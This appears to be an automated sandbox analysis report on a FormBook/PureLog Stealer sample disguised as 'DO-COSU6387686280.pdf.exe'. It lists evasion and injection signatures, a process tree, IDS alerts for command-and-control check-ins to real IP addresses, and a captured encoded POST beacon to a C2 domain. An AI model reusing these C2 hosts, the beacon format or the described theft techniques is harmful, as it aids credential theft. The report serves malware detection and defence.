Windows Analysis Report
DO-COSU6387686280.pdf.exe

Overview

General Information

Sample name: DO-COSU6387686280.pdf.exe
Analysis ID: 1562315
MD5: ad0da4a07f4866d67b266c8686f76081
SHA1: 894f87c4af3b773215fdfec30606db22d179b7e8
SHA256: 1cd3d14faf26873468674af56f8057334ac672b1579a538764ef87fc107deb52
Tags: exe user-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DO-COSU6387686280.pdf.exe (PID: 352 cmdline: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe" MD5: AD0DA4A07F4866D67B266C8686F76081)
    • DO-COSU6387686280.pdf.exe (PID: 2060 cmdline: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe" MD5: AD0DA4A07F4866D67B266C8686F76081)
      • EnLuReulIds.exe (PID: 5940 cmdline: "C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mountvol.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\mountvol.exe" MD5: E0B3FFF7584298E77DFFB50796839FED)
          • EnLuReulIds.exe (PID: 6380 cmdline: "C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4936 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.DO-COSU6387686280.pdf.exe.5e30000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe", CommandLine: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, NewProcessName: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, OriginalFileName: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe", ProcessId: 352, ProcessName: DO-COSU6387686280.pdf.exe

                    AV Detection

                    Source: DO-COSU6387686280.pdf.exe, Avira: detected
                    Source: DO-COSU6387686280.pdf.exe, ReversingLabs: Detection: 39%
                    Source: Yara match, File source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: DO-COSU6387686280.pdf.exe, Joe Sandbox ML: detected
                    Source: DO-COSU6387686280.pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: DO-COSU6387686280.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mountvol.pdb source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnLuReulIds.exe, 00000005.00000002.3902761074.000000000073E000.00000002.00000001.01000000.0000000C.sdmp, EnLuReulIds.exe, 00000007.00000002.3902762226.000000000073E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: mountvol.pdbGCTL source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: DO-COSU6387686280.pdf.exe, DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3C870 FindFirstFileW,FindNextFileW,FindClose,6_2_02A3C870
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 4x nop then xor eax, eax6_2_02A29F00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 4x nop then pop edi6_2_02A2E37F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 4x nop then mov ebx, 00000004h6_2_034B04DE

                    Networking

                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49719 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49719 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49757 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49744 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49749 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49751 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49761 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49761 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49714 -> 202.61.233.66:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49714 -> 202.61.233.66:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49753 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49746 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49764 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49729 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49737 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49748 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49762 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49754 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49745 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49758 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49752 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49750 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49760 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49763 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49733 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49766 -> 194.58.112.174:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49725 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49759 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49765 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49765 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49756 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 118.107.250.103:80
                    Source: DNS query: www.futuru.xyz
                    Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
                    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                    Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                    Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownHTTP traffic detected: POST /dlkm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.kkpmoneysocial.topOrigin: http://www.kkpmoneysocial.topContent-Type: application/x-www-form-urlencodedContent-Length: 206Cache-Control: max-age=0Connection: closeReferer: http://www.kkpmoneysocial.top/dlkm/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36Data Raw: 55 62 52 78 6d 3d 73 36 4e 51 46 30 31 32 43 6f 63 4b 55 75 54 64 6c 4d 42 38 33 4b 2f 71 63 4f 4c 34 67 55 42 5a 33 71 2f 6b 62 38 30 58 51 73 6f 39 38 62 39 38 4c 77 46 71 64 62 55 79 32 44 4c 52 6a 68 45 6a 65 7a 61 79 76 31 63 48 31 71 6f 66 71 35 4b 30 46 58 75 44 70 53 30 49 78 61 67 4d 38 66 53 65 6b 45 67 54 68 52 67 77 46 79 49 36 36 50 42 59 69 58 70 63 44 2b 6c 5a 39 41 64 37 2b 53 31 7a 6e 71 4d 48 6e 62 73 56 6f 56 50 6f 72 62 69 61 2b 63 67 64 36 43 61 46 67 61 47 62 78 65 63 48 72 51 57 6b 4d 66 68 53 54 4c 65 56 4d 55 4a 43 6f 69 7a 64 38 4c 78 58 41 2b 62 65 47 6d 68 75 4a 37 4b 58 45 30 6b 3d Data Ascii: UbRxm=s6NQF012CocKUuTdlMB83K/qcOL4gUBZ3q/kb80XQso98b98LwFqdbUy2DLRjhEjezayv1cH1qofq5K0FXuDpS0IxagM8fSekEgThRgwFyI66PBYiXpcD+lZ9Ad7+S1znqMHnbsVoVPorbia+cgd6CaFgaGbxecHrQWkMfhSTLeVMUJCoizd8LxXA+beGmhuJ7KXE0k=
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:55:48 GMTContent-Type: text/htmlContent-Length: 808Connection: closeVary: Accept-EncodingLast-Modified: Thu, 20 Jun 2024 14:25:06 GMTETag: "328-61b5314d78b6f"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 
61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.cs
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=na0%2BdNc7Sz9PRExX9CV11b2lVgfDZypMcHE39JDjHs00WMsCXPXh3gy2FBK1ExDxREUVp9D0H%2BK9jhVKqKMMZ28%2BIA%2BB2i6mhWU1NeCUlgu92dO7g7%2Bw6BQeaZhQR9wI0Snv275hc8KK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cbfbdd9432dc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=776&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
